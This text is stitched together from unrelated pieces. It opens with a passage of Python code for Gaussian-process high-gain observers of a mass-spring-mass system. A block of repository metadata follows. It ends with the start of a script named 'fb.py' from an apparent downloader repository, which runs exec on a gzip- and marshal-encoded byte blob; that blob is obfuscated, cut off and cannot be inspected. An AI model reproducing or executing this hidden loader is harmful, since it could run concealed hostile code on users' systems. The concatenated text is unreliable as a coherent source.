            mean_deriv = GP(reshape_pt1(xhat), reshape_pt1(u),
                            kwargs.get('prior_kwargs'))
    else:
        mean_deriv = np.zeros_like(xhat)
    if np.any(kwargs.get('saturation')):
        # Saturate the derivative of the nonlinearity estimate to guarantee
        # contraction
        a_min = np.min([-kwargs.get('saturation')])
        a_max = np.max([kwargs.get('saturation')])
        mean_deriv = np.clip(mean_deriv, a_min=a_min, a_max=a_max)
    # Integrator chain A; B injects xi into the last state derivative
    A = np.eye(xhat.shape[1], k=1)
    B = np.zeros((xhat.shape[1], 1))
    B[-1] = 1
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(xi))
    # Directional derivative of the dynamics along the observer vector field
    DfA = reshape_pt1(np.dot(reshape_pt1_tonormal(mean_deriv),
                             reshape_pt1_tonormal(ABmult)))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    LC2 = reshape_pt1(Gamma2 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1)
    xidot = reshape_pt1(DfA + LC2)
    # Also check eigenvalues of M for stability without high gain
    AB = np.concatenate((A, B), axis=1)
    ABO = np.concatenate((AB, np.zeros_like(reshape_pt1(AB[0]))), axis=0)
    K = np.array([[k1, k2, k3, k4, k5]])
    C = np.zeros_like(x)
    C[0, 0] = 1
    M = ABO - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for x in eigvals:
        if np.linalg.norm(np.real(x)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(x) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return np.concatenate((xhatdot, xidot), axis=1)
# High gain observer for the mass-spring-mass system
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity
def MSM_justvelocity_observer_highgain_GP(t, xhat, u, y, t0, init_control,
                                          GP, kwargs):
    """High gain observer for the mass-spring-mass system where the GP
    predicts only the velocity (last state) dynamics.

    Computes the continuous-time derivative of the observer state: a chain of
    integrators driven by the GP velocity estimate, corrected by a high-gain
    output-injection term Gamma1 * (y - yhat).

    :param t: current time
    :param xhat: current observer state estimate
    :param u: control callable, evaluated as u(t, kwargs, t0, init_control)
    :param y: measurement callable, evaluated as y(t, kwargs)
    :param t0: initial time
    :param init_control: initial control value passed through to u
    :param GP: trained GP object (uses .predict) or plain callable prior, or
        falsy to assume zero velocity dynamics
    :param kwargs: options dict; must define a nonzero 'saturation' and the
        observer gains in kwargs['prior_kwargs']['observer_gains']
    :return: xhatdot, the time derivative of the observer state
    """
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    xhat = reshape_pt1(xhat)
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gain (needs to be large enough)
    g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
    k4 = kwargs.get('prior_kwargs').get('observer_gains').get('k4')
    # High-gain design: correction gains scale with powers of g
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2, k3 * g ** 3, k4 * g ** 4])
    if GP:
        if 'GP' in GP.__class__.__name__:
            # Trained GP object: use its predictive mean for the velocity
            mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
                                                     reshape_pt1(u))
            if not kwargs.get('continuous_model'):
                # discrete model so need to differentiate it in continuous obs
                mean = (mean - reshape_pt1(xhat[:, -1])) / GP.prior_kwargs.get(
                    'dt')  # TODO better than Euler?
        else:
            # GP is a plain callable (e.g. a prior mean function)
            mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
                'prior_kwargs'))
    else:
        # No model available: assume zero velocity dynamics
        mean = np.zeros_like(reshape_pt1(xhat[:, -1]))
    if np.any(kwargs.get('saturation')):
        # Saturate the estimate of the nonlinearity to guarantee contraction.
        # Bug fix: the lower bound must be -saturation (as in the other
        # observers); it previously used +saturation, which collapsed the
        # clipping interval [a_min, a_max] to a single point.
        a_min = np.min([-kwargs.get('saturation')])
        a_max = np.max([kwargs.get('saturation')])
        mean = np.clip(mean, a_min=a_min, a_max=a_max)
    # Observer dynamics: integrator chain A, GP output injected through B
    A = reshape_pt1([[0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1], [0, 0, 0, 0]])
    B = reshape_pt1([[0], [0], [0], [1]])
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(mean))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1)
    # Also check eigenvalues of M for stability without high gain
    K = np.array([[k1, k2, k3, k4]])
    C = np.zeros_like(xhat)
    C[0, 0] = 1
    M = A - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for eig in eigvals:
        if np.linalg.norm(np.real(eig)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(eig) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return reshape_pt1(xhatdot)
# High gain observer for the mass-spring-mass system
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity and with gain following a
# dynamical adaptation law
def MSM_justvelocity_observer_adaptive_highgain_GP(t, xhat, u, y, t0,
                                                   init_control, GP, kwargs):
    """High gain observer for the mass-spring-mass system with a dynamically
    adapted gain.

    Same structure as MSM_justvelocity_observer_highgain_GP, but the gain g
    is carried as the last component of the extended state and evolves
    following the adaptation law stored in
    kwargs['prior_kwargs']['observer_gains']['adaptation_law'].

    :return: time derivative of the extended state, [xhatdot, gdot]
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    # Split extended state: observer state and current adaptive gain g
    xhat = reshape_pt1(x[:, :-1])
    g = float(x[:, -1])
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    adaptation_law = \
        kwargs.get('prior_kwargs').get('observer_gains').get('adaptation_law')
    # Gain (needs to be large enough)
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
    k4 = kwargs.get('prior_kwargs').get('observer_gains').get('k4')
    # Correction gains scale with powers of the current adaptive gain g
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2, k3 * g ** 3, k4 * g ** 4])
    if GP:
        if 'GP' in GP.__class__.__name__:
            # Trained GP object: use its predictive mean for the velocity
            mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
                                                     reshape_pt1(u))
            if not kwargs.get('continuous_model'):
                # discrete model so need to differentiate it in continuous obs
                mean = (mean - reshape_pt1(xhat[:, -1])) / GP.prior_kwargs.get(
                    'dt')  # TODO better than Euler?
        else:
            # GP is a plain callable (e.g. a prior mean function)
            mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
                'prior_kwargs'))
    else:
        # No model available: assume zero velocity dynamics
        mean = np.zeros_like(reshape_pt1(xhat[:, -1]))
    if np.any(kwargs.get('saturation')):
        # Saturate the estimate of the nonlinearity to guarantee contraction
        a_min = np.min([-kwargs.get('saturation')])
        a_max = np.max([kwargs.get('saturation')])
        mean = np.clip(mean, a_min=a_min, a_max=a_max)
    # Observer dynamics: integrator chain A, GP output injected through B
    A = reshape_pt1([[0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1], [0, 0, 0, 0]])
    B = reshape_pt1([[0], [0], [0], [1]])
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(mean))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1)
    # Evolve the gain g following the user-provided adaptation law
    gdot = reshape_pt1(adaptation_law(g=g, y=y, yhat=reshape_pt1(xhat[:, 0]),
                                      kwargs=kwargs.get('prior_kwargs').get(
                                          'observer_gains')))
    # Also check eigenvalues of M for stability without high gain
    K = np.array([[k1, k2, k3, k4]])
    C = np.zeros_like(xhat)
    C[0, 0] = 1
    M = A - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for x in eigvals:
        if np.linalg.norm(np.real(x)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(x) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return reshape_pt1(np.concatenate((xhatdot, gdot), axis=1))
# Functions for observing experimental data from full data
def dim1_observe_data(xtraj):
    """Return the observed (first) dimension of a full state trajectory."""
    measured = xtraj[:, 0]
    return reshape_dim1(measured)
| 46.441618
| 80
| 0.564
| 5,394
| 40,172
| 4.05914
| 0.050983
| 0.114181
| 0.035168
| 0.05024
| 0.93647
| 0.934049
| 0.932816
| 0.928431
| 0.922083
| 0.913953
| 0
| 0.031445
| 0.304142
| 40,172
| 864
| 81
| 46.49537
| 0.751807
| 0.154063
| 0
| 0.882526
| 0
| 0
| 0.145482
| 0.00062
| 0
| 0
| 0
| 0.001157
| 0.014684
| 1
| 0.0279
| false
| 0
| 0.005874
| 0.001468
| 0.061674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
854cee6eea04177eadb880318bb1ef5c5cb7d5c9
| 185,407
|
py
|
Python
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/fb.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 44
|
2021-06-28T15:57:18.000Z
|
2022-03-22T07:36:13.000Z
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/fb.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 1
|
2021-11-26T13:28:10.000Z
|
2022-01-10T21:23:41.000Z
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/fb.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 5
|
2021-08-23T17:34:56.000Z
|
2022-02-25T19:23:59.000Z
|
#ENCODE BY CRYPTO
#YOU CAN TRY THIS DECODE GOD BLESS
import gzip,marshal,zlib,base64,binascii,lzma
try:
exec(gzip.decompress(marshal.loads(b's\x8a\xfc\x00\x00\x1f\x8b\x08\x00\x83\x83\x98a\x02\xff|]\xd9Z\x14M\xb0\xbc?O!(\xa8\x80\xd05\xbd\x8b\x1b .\x80\x88\x8a\xca2"\xdd\xd5\xdd\x8a\xec\x8b\n*>\xfb\x99\x88\x8cr\xfe\x8b\xf3\x9d\x0b\x17`\x98\xe9\xae\xce\xca\xca\x8c\x8c\x8c\xdc;<9>\xbb\xb8QW\xe7m\x96L\x1dVg\xe7_\xab\x83\xa9z\xef\xa8:\xf7{{S_~\xed\x9dL\xfd:\xd8\xab\xff\xe7\xe2\xec\xea~{\xd9\xfa;z\xcd\xf4\xc1q\xd5\x9c\xdf\xc1\x0b\xa6\x9b\xd6\x1f\x1f\x9e\x9c\xb5\xe7\xe7w\xea\xdb\xfdK\xd7\xf5/\x8b\xba\x7f\x19\x15\x83?\xd1\xe0\xff\xb1\xfd)\x8bj\xf0\x8d^\xff\xb2\xeb\xfa\xfd\xc1\x97\xc9\xbb\xc1_\xd1t\xff\xa8\x7fY\xf9\xc1\x9f\x94?\xb9\xac\xb3\xc3\xfeeS\xff\xbf\xffi\xaa\x7f\xdf\xf9\xa1\xff4\x837\xab\xcf\xfb\x97m6\xf8F;\xf8"\x1f\xbce\xf9rl\xf0\xa6\xe5\xdb\xc1\x97x\xf7\x14\x1f8\xb8\x98\xfc\xbd\x1b\\\xc9\xe0O7\xf8\xdc\xbc\xd3\xff\x9b\xcf\xfd\x8b\xc1?\xed\xc7i{\x87\xaeK\x07WXDw\xf1[\xf7\x9e\x0c\xbeQ\xf3\xd5\x83\x17UI\xffl\xf0u\xf2x\xf0\xab\xc9\xe0\xd5\x83\xcf\x8c2\xfc\xae\xee\xbe\xf7\xd5n\x19\xef\x1fus\x83\xcbK\xe7\xec\x1a\xdb\xc1\'\xf9\xc1w}d\xff\x16\x11\xee\xdf\xe3\xbb\xcd\x93\xfe\xd1\xc8\xca\xe0[\xce\xd6\xaf\xc0\xa5V\xf8w^_D\xb6\xa0\xae\xc2\xc5\x1d\xbe\xb7\xaf*~7~1\xb3s\x03/\x19\\\x86\x1b\\\x92\x8b\xec3\\m\xef\x1ey\xac\x9a\xfd\xcc\'\xf8zb\xf0W\xbe\x8bO/\xf1\\\x06\xcb\xd5\r\x9eM\xdd\xd9\xfbW\r>c\x1d\xbf\xb4v\x7f\r\xff\xffh\x0b\x80\x17\x94\xb1\xfd\x02\x16\x13\xff\xdaM\xb4\xde\xde\xa2\xebvn\x0e\xbe\xc2\x8b\x9br\xf0\x82ZW\x8d+J\x9e\xc0\x04\xe6\xe7\x07/+\x1a\xbb\xa3\xbc\xfb>\xfbt\xf0\xe3\xc1\xb7\x1c\xae\xc4\xd5\x1b\x83O)\xed\xb1\xb6\r\x9e\xb1\x19F\xd3\xfd\xb1\x05\xc1s\xc4\x0f\xf1\xcdv\xf0\xffv\xf0b?\xf8S\xba\x9d\xc1\x0fz\xcb\x83\xbf\xe2|q\xf0\xbd\xd8\x1eO7\xf8Y\x87\x85\x84\r4\xb3\xf6\xb1\xdd\xc0:}k\xf7\xc07\xcbo.\x0c^\xde\xde\xc0\x13kp__\xf1\t\xcf\xf0\x16\xdf\xb4>\xad}>\xee\xa4\xc1\xe5\xa6z\xe4\xbd\xc1\x7f\xaa\x1e\xae\x10\xbf2j\xaf\xf2\xb8G=i\xda\xf7\xe0)T-\x9e\x17\xac\xa5\xd7\xad\xcd\xc2\xeef\xed\x01\xc2<\x8bB\x8bR\xd8/\x96\x85\xfe\x8f?z\xf7hpKMj\xa6\x83E\xf5\xc5`A\xabj\r\xeb\x8f[\xf5\xb
d\'\x17o\xf9\x0f\xdec\x07?\x1b<\xc3\xaax610\xe5.{r\xe7\xa5-EW\x7f\x9e\x84\xdd~\xc6]L\x8e\xecc\xf1d\xbb\x0e\x1b\xe9\xf3\xb8\x0c7\xea\xb4\\\x89\xdd\x11\xfem\xbb_\xd8\xc0\xb8\x99\xa2\xbegk\x83\x8biqA]\xffh`Yma\x7f\\\xb1:x\x80\xc9\xda\r\xbb\xfc&6K\x1c\xdc\xcemX\xc6\xc7\x9b\xe1\xfb\xbf\x07\xaf\x1f\xfc\xb0\xc6\xbe\xc33\xafq\xa3\x83\xf7\xads\xdbEnpY\r>\xa32#\xc3\xe5\xf2\xf9g\xb3\xb8\xb1YX\xc0\xb6=\x12<U\xd8\x0cL\x02;\xb3M^\xe1\xc1\xc2\x98\xfe\xd8\xaa6\x91m\xfb\x92\x17}\x8d;\xda\xe5\xe7\x0e\xee\n\x1f\x1cux6\xe9}\xfc\x05_p\xdd[]\xb3\x0b\xc7\xe3n\xaa\x85\xf0U\xf9\xed\x066]\xf5\xe3p\x84\xff~\xc7\x13\x1c\xecK_\xeb\x91\x0e.\xa1\xca\xe11\x9an\x99n\x83\xdfj\xda\xc1\x17e&k\xf2r\x95\\\xe9\xe7\x83\xbf\x12\xfb\xe5\xb2y0\xb82,2\\Yf\x0f\xb8l\xcc[\x95\xcd\x9b\xd6\xac\x1fw\x16\xe5\xad=\x06\xef_\x98\x81D\xbd\xd6\x8c\xb4\xa2m\x1e\xe2\xbdGi\xa5\xb8GlGZz\xd2\xef\x7f\xb1-\x8ak\xe3vu?\xcc\xdc\xe0\xa9\xf1\xa9]^\xda\xba\xe2\x11\xe3\xc3\xf0\xc3*6\xb3h;\xf3|U\xfbC\xce\xca\xfcG\xff\xc6\xc8\xd3\x137R\x99\xc3\x8b\xdc\x8a\xd9\x7f\x11}\xef\x8d\xbd\xb3\x0f\xc2\x0f\xdaj\n\x1f0\xb8\xa2\xca\xf6:\xde\xbb\xec\xccU\xd6\xe5=[\x0c8c\x18G\x87\xfb\xc6\x0b\x12l\x9a\xc6\x0c\x04^\xa7\xf4\xf6\xafk\xec\x9d`\xa4\xb0N\xbcK\x07W\x82m\xe3\xabw\xe6\x94\xeb\xee\xf7\xf5=:\xb3#\xbb\x91\x8a\xa7\xc0\x9d~\xbfZ\x82Y\xfa|\xcfl\xcbG3\xb6V\xb5\x1c)\xf6F\x83\xf7\xc4\xf7\x921<\xcc\xbf\x83\x9fdx\xc5\x92\xb9E\xd8\'\x8e\x1e|\xb3\xc9?\x0c\xbe\x91\xbf\x85Q\\\xfe\xb1\x8d\xee\xaa\x81\x97i\n\xf9\xcd\xf4\x19\xfe\x1al\x91"\xd3\x1f8\x8d\xd6n\xd5\xf1Un\x0f\xde\xbf\x9a\xbf\xbb\xa5c\xaa\x98\x1f1\xff\xe8\x8bg\xe3\xb6@\x9e\x8e}\xd9\xcc\xc6Goy\x85\xfd1}\x9d\xda\nF\xfe>.\xeb&\x96\xeb\xd4\x0e\x01l*\x9c\x970\xb2\xca?\x1e\xfcB\xe37\x0f\xec\xfb\xae\xaa^\xf7o\x0f>\xbbl\xed\xf7k\xc7\xd3\xa3\xbfW\x0e\x16\xa9o\x1b\xc0\xce\x1f\x18V\x14\r\x9cd\xed\xf1\xb2\'\xf7\xed\x08ip\xa8E\x13p?\x83o\xe0Q\xd5\xf6\x1c\xab\xcc\x96\xb4h\xdf\r\xbfY\xf8e\xdb\x98.\x1e13\xaa\xe5\x13\xdb\xfc\xf9=\xb3\xcf\x1a\xfb\'zx&SK\xf1\xb4\\\xb2\x81]\x1d=\x84_\xfe\x89\x1d:\'g\x06\xef\x1c\xcf\xe0/\
xb3S\xf8\xbd\x861\x80o\xcc;5\xb8\x8a\xc8\xcd%K\xf0\x12f\x92UN\x1fp\xdbN\xa4.\x87\xfb\xc4\x96M\xf66\x0f\xed\x9e\xaa\xe6uLG7x\xdd\xeb{\xab\x08@\xb2\xe7X\xa7\x9bX\xdfy\xf9\xc2\xd8\x1c\x19\xec\x15\xd6\x87?\xa5\x1f\x1f\xc5\tZ}\xb1\xdd\xe5:,\xbc\xabnu\xda\x1d\xd9\xfcC\xf3\xa2U7\xf7\xe7\x06\xdem\xec\xc7\x17<hs<\xd8\xfb\x1d6[\xef\xf3#\x9cz7\xddW;\xfc:\x7f\xf9\xdc\x1e\x88\xaf\x1e\xca\xebp%\xed\x96j\xbf\x8a \x00\x8b\x08#No\xda\x8e\x0f\x97\x08\xc7\x83GR)\x98h\x11\x064\xa7\xb6!\xb1\x19\x8bd\xd2\x0eQ\x9c\xfdtF\xf9\xfc\xe0\x93\xeb\xc2\xcc\xbc+\xa6p\xc5\'\xa5\xb6B\xc6\x8b\xbb\xb0\xc3\x0c\x8b\x8e\xa5\x86[u\xcd\xb1\xf6N\xda\xd8\xc7\xe3D\xa9*\x1dix\xb8~\t\xcea\xc1<D\x11\x1c\x0e\x16\xbdwe\xbe\xdb\xf7\xb6c\x0bc\n\x05\x16U1\xa5_h\xa2M\xbb\x9d\xa6\x9d\xc7W\xcd[\xf3\x0bx\xa3\xd2\xbd{\xab\x80\x0c\xc7wt\xeb\xad\x059\xf6U\xf2\xd6\xec-\x8a&\x9f\xdf{\x96\xda\x1e.\xfd\xb3\xf7f\xb98n\xab\x1c\x8f(y/\x9f\x04\xeb\xaao\x8c(b\xea\xec7\xb0\xfb+\x9d\x94\xde\xbd\xb1\x97\xf2\xe5\xc5c3DX\x1c\xdcU!\x87\r\xb3\x8b\x1cB\xcc\x1e\xe2\x86r\xcc\x1e[\xdd3\xdbG\xe8\xe6\xe2\xdcn\x18\xdb\x1f\x87\x1b>\x81..\xc2QS\xac\xdb=\xd7\xfa(\xfc\x84\x8f\xb7\xb0\xd33\x8a~\xc1\xa7-\xdbO\x1d\xcc\xa5~\xbd\x85\xb32\x1fXDY\xce\xc3E\\}\xb8+C\xe8\xechd0\x97_\xe1\x9c\xc8\xcd\xc1 
\xc0\x89\x92\'\xd1\xf5\x19\xde\xe5\x86\xddl\xde=\xfc6\xb9o&\xdad\xd7\xb6\xf1\xe91\xdc0\xd6\xf4t\x0b8\x02\xaa\x89\xcd\xf5~\xff\x11\xf7c\x1f\xde\x06G\x1f\x1e\xf9\xc0\xfb\x0e\\\xf1Os\xe1%\x8e5\x97\xe0#\xd2y[\x0f\\\x006\x0b\x8f@x\xfa\xf4\x9e\xdd\xa9\x8b_\xe1\xaf\xe3\xab\xfe\xd9\x1eb\xf2(\xf9\xf8\xc4.\xad\xf0?`\xfa\x1b\x17\x9b\xb6k\xe0\xc0;\xf7\xd6~\r\x96\xd4Eo\xcc\xe9\xc2\xd1\xf2)\x96Z\xbd\xce\xbe\xc6:p\xdf\xf1x9\xb6\xb3\xd4\xf5\xec*\x9c\x0ee\xd7j\x83\xd68\xca/\xed\xe4\xc0n/\xaa\x07\x8a\x98\xb1O\xeaI<k\xee\xb2\xafvH\x15\xbc\x84\x89\xad\x1b0\x8f\xe8\xbb\xf9~\x97\x14\xdc\xbfg/\xed\x8d\x10\xeaD\xdd\xf7\xb5\xd7v\xc9\xd8E5\x9em7e\x11,\xdcK\x8bc\x06\x87(\\A%w\x8e\xed\xea\xe2f\xf2\x0f\x0c\xe1\xafYh\x93|\x9f\xbb!w\x96Ma\x11\xbb\x9b\xab\n\xcaz\xb6U\xebd\xd3v1\x16\x1c\xc7kQ\xdd\xb38\xa9\xab\xc6/\x14\x92\xc1?$?\xc7F\x1e\x9akGZ\x81 \x17\xc1;\xfe\xe0\x84,\xda)sHe9x\x95\xcfl\xe7\xb5\xe5\xecC\xbc\xd3\x84\x1d1]o\x04Qz~\x99\x1f\xca\xd3G\n\xf2\xb8Q\xbe]O(\x17q\'x\xc7\x1b\xe3X\xb8JG{a\xf7\x88\xcf\xa8\x14\x90\x94X\x99\\\xff\xcf\xec\xe4\xc3\x8d\x95\x08\xc7p\xe6v!\x0c\xc7\x06O\x0f\xee=\xc5Zaa\x8ag8=\x16,\xb4\xc7\xafp#\x157\x19\xf9l\xdc3S\xc0\x96\xc5\xcfkx\xd1\xae\xdd1\xc3\xc0\xb6\xc7\x85TJ\xa2\x9c\xeb\xca\x85\x07\xb0\xbc\xfb\xb0\xfc\x07OF\xb5\x15;%\x0e\xa5\xad\x16O\xb8*\xfcQ\x96\x06\x97\x867\xf3\xf1\x0bX\xda\x91\x99[\x1d\xdd\xb9\xa5\'\x1c+\xb9\xc5\xe3+\xf2\rE\x8d8\xba\x8a/\xf7\xf0\xeau>\xfb\x0f\xf6T\xb0\x11\xab\xf4.~\xc7Y\x9c\x16\xd54\xac5\xb8\xfe\xf2\xa9\x9dv\xf4\xfb\xedG\\\x06\x0c)~cfUd\xfb\x9d\x1el\xb4\xfc\x1c\xbb,\xbfkvaY-\xa2\xea2?7\xd3\x82\xe9\xd1\x89\xe3\x11\xb4\xa7x.\xf3\xfd\xdb_\x82{U0\x03\xe3\xaa\x93\xed-3\xe2\xda]\xc3\x187a\x02\xf6\x02<8W\x7f\x80\x17\xb8\xf3\x86\x9fk\xc9\xde\xc0\xe9\x9d}\xdf{\x06\x17\x8d\x0f-\xedy`\xd7\x95\xf0\xc7\r#g\x9c\xce\xd9\xf2ke1\x9d\xed\xcc"\xff\xfd\xd3\xde\xbf(_\xd8\xda"t\xa8\x8b\x18\x8f\xc0\x8fl\xd9\xdb\xf9\xe8\xdcL\xaa\xaa\x91\x90\xf5\xa2\x91\xa7\x87\xf6\xb8\xda\xe2\xd7G\xac\xc5k\x8b\xb9\xaab\xdc\xd6\xdc\xf7\xb6\x14\x03$?\xb1\xb3\xf0\x1a|.\x83,\xe5-y\x9
7\xce\xd8\xff\xe8\xca\xb3\xc2\x0e\xe0NarWn\xccc\xf5\x1f\xbe\x1e\xf9b\xef\xe5\xf4\xa7\xd6\tW\xc7\xdfO\xde\xd7fy\xb8\x872\xdd\xc4\x9d\xca\xc1U\xca\xc4\xeb\xee\xa1mJ\x17\xcf\x8f\xda)\x83\xc5t\xf1\x06\xa2\xbb%\xac\xda\xa1\xd9\x026\x08<\x8a\xcb\x91.\xa6\xa3\xb63+\xa6mWv\xd6#i\xaa\xb3\xb7\n"2\xa5k\xf0\xc0\xf19\x8d\xf3\x81\xc2\xbcT{/\r\x01\xfc9\xde\xe0\xa5\xedX\x04\t\xbe\x19\x17Z\xd0\xe93\xd2q=\xeaj\xfc\xa9\x9ddD&"%\t\x91\xb9\x0e8\xd7\x96g\xe8\xab/\xf8\xc5\x1bJ\x00\xe5\x94\t\x84d\xe6\xfd\xa2\xe4\xaf"n8\x8f\xfa\xad\xed]\xc2\x1bnQy\x7f\xef\xd6(v\xd0\x8b\xd7\x8d=\n\xe7\xb6dh\xa9\xa5w.\xdax\x84g\x99?\xb3\r\x8c;*\x0c\xccA2\x80\xd3\xb3s\xcf\x91L\xdd\xb4\x8c\n\x17\xc9\xac\xa0\x9b\xb7\xfdI\xa7\x97\x1d \xb4\xfa`\xa9\'N1\x9c\x01t\xfd\xbd\xab\r\xf9,$\xd4x\xce\x08\xac\xbap\xd8\xb8_3?d\x1dm\x81\x8c\xbd\xf8\xa5\xf0\xc2u\xd3\x7fW\xf4\xabLV\x18\xc1\xe2\xb9\xa4\xdbv\xb4\xc0\x1f\xe0\xacg|^\tD\xf1J4\xe1\x96\xcb\x1d\xfc`\xf4%\xb6\xea]\xff\x07w\xfd\xdd.\xb1\x8e\x8e^\xff=\xc1jm>P^$\xcf\xc4\xf3\xa0^\xc5kW\xf5\xd6x\x9c\xd9/K\xcf\xdbb\x1b\x0b\x88\x08\xae=C\xde\x80(\xa1\x0e\x0f\x93\xe8[e+\xe0\xe3\xfe\xd9\xd5o\x99n\xfd\xdb\x9e\x9d\xe3^\x84\x0bH>\xda\x93\xc5\x06,C\x8a\x8fM\x14\xb2C\xe05U\x8e4&\x19\xb1\xe8\xa7\x10~\xe0\x93?krf\x06\x7f1\x95\xc3\xafe\xcd\xd9\x82\x10\xb0\xd6\xfcX\xdd\xabob\xc3\x9d\xdcy\x98\xed?\xfcj\xbb\x8b.C\xf1U\x19\xef\xca\x8d\xd3M_\xdbfB\xea\xc4\x00\xd8\xd9\xd2\xe6\xf2(.\xdd\xf9\x83[\xfb\x887\xf9)H\x07W^\xfeD\x16\xd1{cW\x8a\xb7\xf0\xf9\xf8\x95l\xcdb\xc8\xfe\xfb\xf0%\xcfa\xec\xa7t\xea\x83\xd9D\x97]\x10Uq\xb5\x05\x19};\x0e];\xbe\xfb\xa4\xb2\x8d\x8a\x07S\xb8s[\xa0::yi\x0f\x9fY)\x8e\xbbF9S\xf5\x06\xb1\xcc&\xd6\xe6Dy\x1a]\xf4w\x8b\xa5p\xb5-\x9c\x08\xf2\t<^\xbb-\xace\x9c\x85\xf8\x19\x98\x05\x1eLSl\xd8\xcd 
O+\x9a\xa78Yz\x8f\xc3&\xb8\xdb\xb3G\x88x\xb7\xf1\x0f\xbf\xd9\x1a"\xac#\xac&\xbc\x0cA\x03\xe3y\xa6f\xf1\xa6\x99w\x95{\xf3av\xa4\x1c(\xb5F\\\x9b\xe2\x89U\x11b\xc2|\x1d;\xc1\x03\xc1q\x8f,F\x825V8;\xe0\x87\xa2z\x02f\xfe\x13w\x83\xfc\xb5\xfc$\x9c\xa0\xd2\xf1\xach\x98\xa1\x9ar"\xf88W\xcc\xbc:\xd5\xa5\xb6\x8f\x81\xf0\r\x02\x81\xdb\x80\xfc\x9a\x85r\xd7 A\x0f\x00\xcd.\x15\x17\xbf\x84\x07\xb7\xf3\xce"\xc9\xb6\xfc\xb1\x8d\x1b\xcfn\rS\xd82\x1b=5c)q\xd8\xe0\xbd\xf1\x8ca\xca\xbc$\xfd1l\xa3T0\x91\x99\xf7\x8a\xdc\xde\x87\xed\x0f\n%\xf3\xa7BWB\xdcP\xbd:\xc6y\xf9\xd2b\x1a\x82\xc3\xc0s\xcb\x1d\xa7\xe4=Z\xd8\x94\x17-p|\xe63\xbf\xcd\xa1\xc2\x1e\x9a|{N\xe1o"\xd7\xc6\x84v\xc5r\x06l\xbb\xba(\xe7\xfe\xfeRv\x1e/+8\xf5\xe6L\x9al\xff\xd1\x05v\xf4\xa5\x9d\xf3\xf8\xf8&\xf8\xf5\xea\xc4l\x13oO\x185y\xb0\xf2wS\x01A\x99\xc7?\xec\x1a\x802\xb0\x06\xd0n\x19\xdeB 